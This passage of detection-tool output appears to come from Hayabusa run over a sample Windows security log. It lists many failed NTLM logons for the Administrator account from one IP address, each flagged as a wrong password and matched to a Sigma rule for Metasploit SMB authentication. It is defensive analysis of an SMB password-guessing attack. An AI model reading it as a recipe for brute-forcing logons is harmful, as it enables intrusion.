NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.649 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8WHs5hduf7SmUcLK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gdo1txjJXiRLbUDH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JK8jP3ftKQOyutGe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.785 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DdbEjo88dBJRhrKp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.832 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FZCVkXkwhbuSM654 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.929 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z2mc9WScfBa88rtO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.011 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: Lee7qYLkXQoz8rRh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.011 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.057 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f5g1ZKpZuZU1WRoC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.057 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h4ST7RrHJxAQHHbn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.108 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GtW1hBHF97YqvN4N : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.149 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.189 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xVKlPytPofO9LQBm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.189 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GOkZ9yjvfL51UYXo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.235 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fAxfxSbRqGO7Dej0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.277 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: D7XmvDYk6zFLir09 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.313 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.355 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mWcl6CKdSMxd8edZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.355 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SxBQlFZvGBqDdobn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.435 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: AXN94VanwME6q8rc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.435 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.467 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JOj7CZ3stJXePY8b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.467 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DXjmqxguFGL3f8cV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.513 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qHWmdxnRrMbxrdlN : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.681 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6ROBnjuyHn4FRugk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.681 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.754 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zGxuUxasL680O21l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.754 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CYoM984EzAkUtBoa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.812 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0e3ATNpzeeAf6Qax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.857 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1A0dGhpVy8kgiRP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.889 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xGgNAKJM5RAt9B5K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.935 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: c3DpedXujvQpZnjQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.981 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.019 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BsaSjESaUHbsIxJL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.019 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.062 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ca4dlxyEco3VOapw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.062 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.100 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Z6lJc7DXAOcNZ2G : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.100 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Olt5mS7na07VDJE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.144 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oCFeQcUMDTs0ev8v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.185 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.233 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FYmH6CQrizoZ1DAx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.233 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iYtujXkzySwZQFk8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.285 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KE9v6wzrebvjvDIl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.327 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.365 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 81gmRFFBHI1s4dqi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.365 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: C8gHWPDjQM8M3tiQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.409 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: szj4mJvtFV06CuR2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.442 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.493 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ceGEl87hOM0InAAd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.493 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XRv3C3rRxYXTgckj : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.541 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.581 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TaPkJPIQnbL3VyUC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.581 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.618 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LZ7PZAT6hWWHNc29 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.618 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AJVD4uVhwfLSJ6Ab : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.664 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q6KME1I6tE0v9UAq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.751 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Qtt1rk4n3tOJko2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.751 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: prPsA8EZHGfGPSHm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
